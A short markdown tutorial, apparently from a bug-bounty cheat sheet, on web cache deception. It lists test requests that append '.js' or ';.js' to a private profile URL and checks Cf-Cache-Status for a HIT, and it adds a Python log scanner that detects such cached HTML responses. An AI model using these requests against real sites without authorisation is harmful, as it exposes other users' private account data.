# Web Cache Deception
## Introduction
Web Cache Deception is an attack in which an attacker deceives a caching proxy into improperly storing private information sent over the internet, and then gains unauthorized access to that cached data.
## Where to find
`-`
## How to exploit
* Normal Request (For example in the settings profile feature)
```
GET /profile/setting HTTP/1.1
Host: www.vuln.com
```
The response is
```
HTTP/2 200 OK
Content-Type: text/html
Cf-Cache-Status: HIT
...
```
1. Try to add a cacheable extension (for example `.js` / `.css` / `.jpg`, etc.)
```
GET /profile/setting/.js HTTP/1.1
Host: www.vuln.com
```
The response is
```
HTTP/2 200 OK
Content-Type: text/html
Cf-Cache-Status: HIT
...
```
If the `Cf-Cache-Status` header in the response is `HIT`, not `MISS` or `Error`, then try to open the URL in incognito mode.
2. Add `;` before the extension (for example `;.js` / `;.css` / `;.jpg`, etc.)
```
GET /profile/setting/;.js HTTP/1.1
Host: www.vuln.com
```
The response is
```
HTTP/2 200 OK
Content-Type: text/html
Cf-Cache-Status: HIT
...
```
If the `Cf-Cache-Status` header in the response is `HIT`, not `MISS` or `Error`, then try to open the URL in incognito mode.
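The same signal can be checked from the defender's side. The following is an added example, not part of the original notes: it scans edge or proxy log records for 200 responses that carry `Content-Type: text/html`, were served with `Cf-Cache-Status: HIT`, and sit under a URL ending in a static extension (with or without `;`), which are candidates for review. The record layout, the extension list and the sample records are assumptions constructed for illustration.

```python
from urllib.parse import urlsplit

# Assumption: extensions the cache treats as static; align with your CDN's cache rules.
STATIC_EXTS = {".js", ".css", ".jpg", ".jpeg", ".png", ".gif", ".ico", ".svg"}

def static_suffix(url):
    """Return the static extension of the last path segment, or None."""
    segment = urlsplit(url).path.rsplit("/", 1)[-1]   # e.g. ".js" or ";.js"
    dot = segment.rfind(".")
    ext = segment[dot:].lower() if dot != -1 else ""
    return ext if ext in STATIC_EXTS else None

def check(record):
    """Flag an HTML 200 response that the cache served under a static-looking URL."""
    headers = {k.lower(): v for k, v in record["headers"].items()}
    ext = static_suffix(record["url"])
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    cache = headers.get("cf-cache-status", "").upper()
    if ext is None or record["status"] != 200:
        return None
    if ctype != "text/html" or cache != "HIT":
        return None
    cc = headers.get("cache-control", "").lower()
    return {
        "url": record["url"],
        "extension": ext,
        "path_parameter": ";" in urlsplit(record["url"]).path,
        # True means the origin asked not to cache and an edge rule overrode it.
        "origin_forbade_caching": "no-store" in cc or "private" in cc,
    }

def scan(records):
    """Return the findings for every record that matches the pattern."""
    return [f for f in map(check, records) if f is not None]

# Constructed sample records (not real traffic).
H, HIT = "text/html", "HIT"
SAMPLE = [
    {"url": "/profile/setting", "status": 200, "headers": {"Content-Type": H, "Cf-Cache-Status": "DYNAMIC"}},
    {"url": "/profile/setting/.js", "status": 200, "headers": {"Content-Type": H, "Cf-Cache-Status": HIT}},
    {"url": "/profile/setting/;.css", "status": 200, "headers": {"content-type": H + "; charset=utf-8", "cf-cache-status": HIT, "cache-control": "private, no-store"}},
    {"url": "/static/app.js", "status": 200, "headers": {"Content-Type": "application/javascript", "Cf-Cache-Status": HIT}},
    {"url": "/profile/setting/.jpg", "status": 200, "headers": {"Content-Type": H, "Cf-Cache-Status": "MISS"}},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A finding with `origin_forbade_caching` set points at an edge cache rule keyed on the file extension rather than on the origin's `Cache-Control` header.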
## References
* [@bxmbn](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)